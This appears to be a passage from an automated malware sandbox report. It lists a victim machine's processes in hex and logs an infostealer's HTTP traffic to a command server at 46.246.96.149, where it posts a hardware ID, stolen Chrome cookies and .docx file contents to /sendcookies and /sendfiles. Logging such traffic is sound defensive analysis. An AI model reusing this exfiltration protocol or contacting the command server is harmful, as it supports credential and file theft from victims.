73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 38 30 2c 20 4e 61 6d 65 3a 20 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 38 38 2c 20 4e 61 6d 65 3a 20 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 38 37 32 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 32 34 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 39 32 2c 20 4e 61 6d 65 3a 20 64 77 6d 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 34 34 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 37 33 32 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 32 38 30 2c 20 4e 61 6d 65 3a 20 73 76 63 68 6f 73 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 31 30 33 32
      Source: global trafficHTTP traffic detected: POST /getpu HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 10Data Raw: 69 64 62 3d 65 5f 75 73 65 72 Data Ascii: idb=e_user
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=0
      Source: global trafficHTTP traffic detected: POST /sendcookies HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 368Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3c 41 4e 44 3e 6c 6f 67 3d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 46 61 6c 73 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 39 37 38 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 34 2d 31 33 0d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 72 75 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 32 36 39 09 4e 49 44 09 35 31 31 3d 45 66 35 76 50 46 47 77 2d 4d 5a 59 6f 35 68 77 65 2d 30 54 68 41 56 73 6c 62 78 62 6d 76 64 56 5a 77 63 48 6e 71 56 7a 57 48 41 55 31 34 76 35 33 4d 4e 31 56 76 77 76 51 71 38 62 61 59 66 67 32 2d 49 41 74 71 5a 42 56 35 4e 4f 4c 35 72 76 6a 32 4e 57 49 71 72 7a 33 37 37 55 68 4c 64 48 74 4f 67 45 2d 74 4a 61 42 6c 55 42 59 4a 45 68 75 47 73 51 64 71 6e 69 33 6f 54 4a 67 30 62 72 71 76 31 64 6a 64 69 4c 4a 79 76 54 53 55 68 64 4b 2d 63 35 4a 57 61 64 43 53 73 55 4c 50 4c 7a 68 53 78 2d 46 2d 36 77 4f 67 34 0d 3c 41 4e 44 3e 63 6f 75 6e 74 3d 32 Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>name=Google Chrome<AND>log=.google.comFalse/True12404279781P_JAR2023-10-04-13.google.comTrue/True1240427269NID511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4<AND>count=2
      Source: global trafficHTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1117Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b 41 5a 41 50 41 43 4a 4a 57 44 57 54 44 4d 44 44 55 4f 55 4b 56 4d 58 57 4c 57 51 4a 49 55 42 49 53 48 50 44 51 45 52 47 4b 55 4a 56 5a 4e 45 51 58 5a 4c 5a 4c 50 41 41 57 41 49 49 53 57 4d 4e 5a 55 43 4e 48 56 50 58 44 46 55 4d 44 45 51 58 49 4c 54 58 51 41 4a 4d 41 41 52 47 4b 59 42 42 42 49 43 4a 48 4e 4f 46 4a 56 43 47 53 51 4d 42 57 58 4d 51 45 4c 50 5a 4d 53 58 57 4e 57 5a 4f 48 49 4b 54 51 48 53 4e 4f 4f 45 4f 42 4a 5a 59 48 4b 53 57 53 49 53 56 4e 55 43 50 54 4e 44 4b 4c 4a 50 58 46 46 4b 4e 41 5a 57 41 4b 59 57 41 51 57 4b 50 57 4c 50 51 42 4b 5a 4a 4f 4b 48 57 58 55 42 42 58 57 4b 51 46 57 58 54 4e 49 5a 46 59 57 49 47 54 4c 42 48 5a 48 4b 46 52 4a 50 44 42 4a 59 52 51 50 51 42 54 5a 55 51 56 55 52 47 4e 54 51 4a 54 46 5a 43 46 42 54 4f 47 4e 43 53 58 4f 5a 59 55 4c 58 4f 4b 56 59 4f 4e 52 51 4f 54 4e 4f 4d 55 50 56 43 44 42 59 49 52 50 4e 59 5a 53 4c 4b 53 4e 42 4f 57 51 4b 4b 4e 4a 4d 4a 48 4e 52 55 57 42 58 59 4a 47 53 5a 53 50 58 53 4f 4e 47 43 4d 48 54 4e 4f 49 43 58 57 4e 59 47 5a 5a 53 58 55 41 49 45 52 56 4e 46 46 51 4e 58 44 51 56 52 57 46 4d 54 54 4d 53 53 53 4f 42 48 49 4c 42 55 4b 43 44 47 53 4d 4e 4a 42 51 54 52 51 4c 42 44 51 4b 56 52 47 58 4b 57 5a 56 4d 46 41 4c 51 52 47 42 50 4c 4d 47 45 4f 52 4b 4c 42 59 41 4c 4e 47 4a 41 58 4c 4b 47 42 46 47 4a 4a 47 4a 52 55 44 4b 42 4d 51 45 46 4a 58 58 57 4d 41 4a 52 44 54 49 45 44 41 4e 45 50 55 49 4a 43 54 54 44 5a 59 45 51 44 4a 50 4a 49 57 59 44 51 44 52 54 52 55 44 44 5a 53 4a 4c 46 5a 59 49 48 4b 48 52 57 45 47 56 4c 51 43 59 51 41 50 58 4f 49 4a 43 42 45 4c 5a 44 5a 45 4f 46 50 4b 53 49 4a 51 4d 41 51 4d 53 4d 58 42 52 45 51 45 45 48 57 58 47 4d 48 45 55 50 4e 47 56 53 44 5a 41 50 4e 56 58 51 4a 43 50 4c 55 4c 46 51 49 58 52 4d 53 46 43 55 4e 48 48 55 46 46 4a 56 46 4e 51 57 4e 55 55 58 53 4f 4d 53 4e 4a 57 4f 59 4e 55 48 54 48 47 41 5a 53 57 59 4f 4b 49 4b 49 53 4
      Source: global trafficHTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1117Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b 52 49 54 44 41 4c 48 57 51 53 41 50 59 56 41 52 51 47 51 4c 59 58 4c 4d 4e 54 51 53 4c 53 50 41 55 49 57 5a 52 52 52 4f 56 45 47 4e 54 50 4c 4e 51 49 54 54 4a 59 46 4b 4e 58 43 4b 45 52 41 56 58 4c 53 47 48 4c 42 52 4b 54 46 50 4d 58 53 53 49 42 5a 44 4f 4e 58 53 4b 48 58 5a 46 57 4f 4e 50 49 50 54 46 47 4e 52 49 59 52 4d 59 50 5a 58 4c 56 58 45 4a 4a 4d 41 48 4b 43 49 59 57 50 46 44 41 48 47 43 56 46 52 48 55 45 49 48 5a 4b 42 56 4d 52 4d 4c 46 53 4b 4d 4f 4d 44 4d 4d 51 5a 4a 4a 41 4f 46 4e 48 46 41 4d 49 42 43 4c 43 4c 5a 48 51 43 49 4b 4c 4f 42 5a 4c 4e 53 56 42 56 43 48 44 4f 59 49 48 4d 41 57 57 4a 4e 51 48 5a 44 47 4b 56 43 4f 43 49 52 51 4f 59 54 55 46 45 57 41 47 5a 57 42 50 4e 4c 4a 46 57 41 4b 59 45 54 41 43 53 45 5a 4c 4d 49 51 4e 4f 41 41 57 53 47 56 4e 42 5a 5a 5a 4d 53 53 45 46 56 53 45 54 42 56 54 53 4d 54 53 41 4a 48 44 59 57 4c 49 42 4a 50 51 55 48 50 58 57 4f 50 53 56 57 51 56 56 53 4c 50 54 59 4f 57 4a 47 57 4c 58 52 4a 4f 4d 51 4d 42 5a 53 4d 57 4c 5a 5a 44 55 4a 49 55 48 59 5a 4c 55 4e 53 4f 4d 4a 4d 57 45 55 42 57 59 53 5a 4d 58 56 44 4e 55 47 53 5a 42 53 46 44 41 43 4f 49 46 57 45 54 4a 52 49 58 56 50 44 4d 53 56 4d 54 4b 45 4b 4e 48 4a 46 46 58 43 54 50 50 44 4b 59 44 58 4f 55 4f 47 4a 41 46 53 58 56 45 4e 54 49 4d 46 4c 58 4e 4b 42 57 53 4f 49 4a 41 5a 4c 5a 54 58 5a 47 42 42 4d 55 41 54 4d 4e 47 4f 43 4f 4c 48 49 41 4f 4f 54 42 45 4e 58 4a 4c 4e 45 42 50 55 59 5a 41 57 45 57 48 5a 43 4f 42 45 55 58 4c 4e 4f 43 42 46 4d 46 4e 4c 43 46 51 52 59 53 45 55 52 55 45 56 51 53 45 47 56 50 43 56 4e 58 59 4f 55 45 42 50 57 59 4a 56 42 4f 56 5a 48 48 53 49 56 51 45 4c 41 53 4c 4d 46 4c 4d 49 47 50 46 54 53 57 5a 55 59 41 47 55 43 4b 46 43 51 58 58 55 57 4d 4d 45 53 54 49 43 54 48 4f 4e 4c 55 59 53 50 55 57 4f 54 51 4b 57 52 52 51 4d 55 48 47 5a 47 41 41 45 5a 4f 50 4f 4b 51 55 4c 46 57 52 50 45 46 44 59 45 4f 4e 4c 4b 5
      Source: global trafficHTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1129Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 55 56 4f 43 4e 44 42 41 54 56 5a 47 57 4d 56 50 54 5a 4a 53 46 5a 52 48 58 49 52 4a 52 43 4e 4b 47 45 4c 49 57 44 4e 5a 47 41 4d 4b 53 42 57 4d 57 48 4c 46 45 58 47 51 42 4f 55 45 54 56 4a 46 4f 4f 51 58 55 48 56 4c 48 43 4c 4e 50 58 56 4d 4d 4a 41 4a 54 48 4d 57 41 59 4a 4c 54 59 4a 54 46 47 46 4b 51 46 4c 53 56 51 50 50 44 58 42 5a 47 4d 44 50 4e 4d 46 49 50 43 55 41 49 45 43 44 59 53 4c 41 43 46 57 50 4a 42 5a 4c 52 4d 48 57 51 4a 44 44 4f 44 47 59 42 4e 43 4d 4e 50 5a 56 5a 45 46 4f 55 4f 59 59 59 5a 53 54 5a 4b 4c 58 56 43 4e 58 57 50 42 4c 42 43 48 54 51 51 45 46 4f 49 4c 42 45 4a 50 4b 52 55 5a 4a 57 57 44 4e 4b 47 55 4e 41 41 44 57 5a 48 43 4f 55 52 46 46 5a 45 4a 43 50 42 47 49 4c 46 46 43 4e 56 54 41 4e 46 58 4c 57 58 51 44 59 4a 55 4c 48 45 55 51 47 4f 42 4e 55 5a 55 43 46 49 59 45 49 54 54 50 4b 45 5a 51 49 48 50 4f 4b 57 5a 44 4d 4d 53 55 42 49 51 58 48 55 57 42 42 45 47 47 52 47 51 50 43 4b 52 46 4d 41 46 4d 43 4b 42 4c 4e 50 58 55 58 43 43 58 51 44 48 51 58 50 4b 48 56 59 51 57 48 58 45 47 48 49 43 44 4f 5a 4a 55 43 4c 54 42 4b 4b 5a 4b 52 4b 4f 51 41 5a 57 58 48 4b 41 48 56 4b 44 4f 46 47 4b 54 49 51 48 45 47 43 4d 50 59 48 4b 4c 47 49 44 45 53 57 4e 41 56 41 53 46 55 43 4f 47 43 59 51 51 52 4c 57 51 49 57 44 46 46 43 51 59 48 59 48 4b 4b 50 49 42 4f 47 4f 4b 58 57 4f 5a 57 43 56 48 4b 4d 47 54 58 46 58 41 4b 59 59 42 5a 51 47 5a 57 53 4d 46 49 43 4a 52 58 47 44 4c 4a 41 48 50 53 54 4d 50 49 41 58 52 5a 4e 4d 4a 42 48 4a 46 56 5a 4f 57 44 4b 4f 4b 50 44 51 52 4b 49 52 41 52 4a 45 4a 4d 4e 50 43 53 45 57 55 46 48 4b 4c 45 4c 50 5a 57 43 4d 57 4c 5a 54 5a 42 46 57 4a 54 49 42 58 41 5a 42 54 54 4a 4f 45 47 48 43 4c 58 55 5a 59 42 59 47 59 55 4c 46 47 4a 50 4c 55 4e 56 4a 43 54 44 4b 56 55 48 4b 46 43 4d 43 45 53 57 58 4d 44 4c 5a 51 4b 44 55 57 54 41 45 43 52 44 42 57 45 43 58 50 43 48 50 42 43 45 52 44 41 4a 4f 47 46 43 4
      Source: global trafficHTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1130Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b 41 5a 41 50 41 43 4a 4a 57 44 57 54 44 4d 44 44 55 4f 55 4b 56 4d 58 57 4c 57 51 4a 49 55 42 49 53 48 50 44 51 45 52 47 4b 55 4a 56 5a 4e 45 51 58 5a 4c 5a 4c 50 41 41 57 41 49 49 53 57 4d 4e 5a 55 43 4e 48 56 50 58 44 46 55 4d 44 45 51 58 49 4c 54 58 51 41 4a 4d 41 41 52 47 4b 59 42 42 42 49 43 4a 48 4e 4f 46 4a 56 43 47 53 51 4d 42 57 58 4d 51 45 4c 50 5a 4d 53 58 57 4e 57 5a 4f 48 49 4b 54 51 48 53 4e 4f 4f 45 4f 42 4a 5a 59 48 4b 53 57 53 49 53 56 4e 55 43 50 54 4e 44 4b 4c 4a 50 58 46 46 4b 4e 41 5a 57 41 4b 59 57 41 51 57 4b 50 57 4c 50 51 42 4b 5a 4a 4f 4b 48 57 58 55 42 42 58 57 4b 51 46 57 58 54 4e 49 5a 46 59 57 49 47 54 4c 42 48 5a 48 4b 46 52 4a 50 44 42 4a 59 52 51 50 51 42 54 5a 55 51 56 55 52 47 4e 54 51 4a 54 46 5a 43 46 42 54 4f 47 4e 43 53 58 4f 5a 59 55 4c 58 4f 4b 56 59 4f 4e 52 51 4f 54 4e 4f 4d 55 50 56 43 44 42 59 49 52 50 4e 59 5a 53 4c 4b 53 4e 42 4f 57 51 4b 4b 4e 4a 4d 4a 48 4e 52 55 57 42 58 59 4a 47 53 5a 53 50 58 53 4f 4e 47 43 4d 48 54 4e 4f 49 43 58 57 4e 59 47 5a 5a 53 58 55 41 49 45 52 56 4e 46 46 51 4e 58 44 51 56 52 57 46 4d 54 54 4d 53 53 53 4f 42 48 49 4c 42 55 4b 43 44 47 53 4d 4e 4a 42 51 54 52 51 4c 42 44 51 4b 56 52 47 58 4b 57 5a 56 4d 46 41 4c 51 52 47 42 50 4c 4d 47 45 4f 52 4b 4c 42 59 41 4c 4e 47 4a 41 58 4c 4b 47 42 46 47 4a 4a 47 4a 52 55 44 4b 42 4d 51 45 46 4a 58 58 57 4d 41 4a 52 44 54 49 45 44 41 4e 45 50 55 49 4a 43 54 54 44 5a 59 45 51 44 4a 50 4a 49 57 59 44 51 44 52 54 52 55 44 44 5a 53 4a 4c 46 5a 59 49 48 4b 48 52 57 45 47 56 4c 51 43 59 51 41 50 58 4f 49 4a 43 42 45 4c 5a 44 5a 45 4f 46 50 4b 53 49 4a 51 4d 41 51 4d 53 4d 58 42 52 45 51 45 45 48 57 58 47 4d 48 45 55 50 4e 47 56 53 44 5a 41 50 4e 56 58 51 4a 43 50 4c 55 4c 46 51 49 58 52 4d 53 46 43 55 4e 48 48 55 46 46 4a 56 46 4e 51 57 4e 55 55 58 53 4f 4d 53 4e 4a 57 4f 59 4e 55 48 54 48 47 41 5a 53 57 59 4f 4b 49 4b 49 53 4
      Source: global trafficHTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1129Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b 52 49 54 44 41 4c 48 57 51 53 41 50 59 56 41 52 51 47 51 4c 59 58 4c 4d 4e 54 51 53 4c 53 50 41 55 49 57 5a 52 52 52 4f 56 45 47 4e 54 50 4c 4e 51 49 54 54 4a 59 46 4b 4e 58 43 4b 45 52 41 56 58 4c 53 47 48 4c 42 52 4b 54 46 50 4d 58 53 53 49 42 5a 44 4f 4e 58 53 4b 48 58 5a 46 57 4f 4e 50 49 50 54 46 47 4e 52 49 59 52 4d 59 50 5a 58 4c 56 58 45 4a 4a 4d 41 48 4b 43 49 59 57 50 46 44 41 48 47 43 56 46 52 48 55 45 49 48 5a 4b 42 56 4d 52 4d 4c 46 53 4b 4d 4f 4d 44 4d 4d 51 5a 4a 4a 41 4f 46 4e 48 46 41 4d 49 42 43 4c 43 4c 5a 48 51 43 49 4b 4c 4f 42 5a 4c 4e 53 56 42 56 43 48 44 4f 59 49 48 4d 41 57 57 4a 4e 51 48 5a 44 47 4b 56 43 4f 43 49 52 51 4f 59 54 55 46 45 57 41 47 5a 57 42 50 4e 4c 4a 46 57 41 4b 59 45 54 41 43 53 45 5a 4c 4d 49 51 4e 4f 41 41 57 53 47 56 4e 42 5a 5a 5a 4d 53 53 45 46 56 53 45 54 42 56 54 53 4d 54 53 41 4a 48 44 59 57 4c 49 42 4a 50 51 55 48 50 58 57 4f 50 53 56 57 51 56 56 53 4c 50 54 59 4f 57 4a 47 57 4c 58 52 4a 4f 4d 51 4d 42 5a 53 4d 57 4c 5a 5a 44 55 4a 49 55 48 59 5a 4c 55 4e 53 4f 4d 4a 4d 57 45 55 42 57 59 53 5a 4d 58 56 44 4e 55 47 53 5a 42 53 46 44 41 43 4f 49 46 57 45 54 4a 52 49 58 56 50 44 4d 53 56 4d 54 4b 45 4b 4e 48 4a 46 46 58 43 54 50 50 44 4b 59 44 58 4f 55 4f 47 4a 41 46 53 58 56 45 4e 54 49 4d 46 4c 58 4e 4b 42 57 53 4f 49 4a 41 5a 4c 5a 54 58 5a 47 42 42 4d 55 41 54 4d 4e 47 4f 43 4f 4c 48 49 41 4f 4f 54 42 45 4e 58 4a 4c 4e 45 42 50 55 59 5a 41 57 45 57 48 5a 43 4f 42 45 55 58 4c 4e 4f 43 42 46 4d 46 4e 4c 43 46 51 52 59 53 45 55 52 55 45 56 51 53 45 47 56 50 43 56 4e 58 59 4f 55 45 42 50 57 59 4a 56 42 4f 56 5a 48 48 53 49 56 51 45 4c 41 53 4c 4d 46 4c 4d 49 47 50 46 54 53 57 5a 55 59 41 47 55 43 4b 46 43 51 58 58 55 57 4d 4d 45 53 54 49 43 54 48 4f 4e 4c 55 59 53 50 55 57 4f 54 51 4b 57 52 52 51 4d 55 48 47 5a 47 41 41 45 5a 4f 50 4f 4b 51 55 4c 46 57 52 50 45 46 44 59 45 4f 4e 4c 4b 5
      Source: global trafficHTTP traffic detected: POST /sendfiles HTTP/1.1Content-Type: application/octet-streamHost: 46.246.96.149Content-Length: 1129Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 55 56 4f 43 4e 44 42 41 54 56 5a 47 57 4d 56 50 54 5a 4a 53 46 5a 52 48 58 49 52 4a 52 43 4e 4b 47 45 4c 49 57 44 4e 5a 47 41 4d 4b 53 42 57 4d 57 48 4c 46 45 58 47 51 42 4f 55 45 54 56 4a 46 4f 4f 51 58 55 48 56 4c 48 43 4c 4e 50 58 56 4d 4d 4a 41 4a 54 48 4d 57 41 59 4a 4c 54 59 4a 54 46 47 46 4b 51 46 4c 53 56 51 50 50 44 58 42 5a 47 4d 44 50 4e 4d 46 49 50 43 55 41 49 45 43 44 59 53 4c 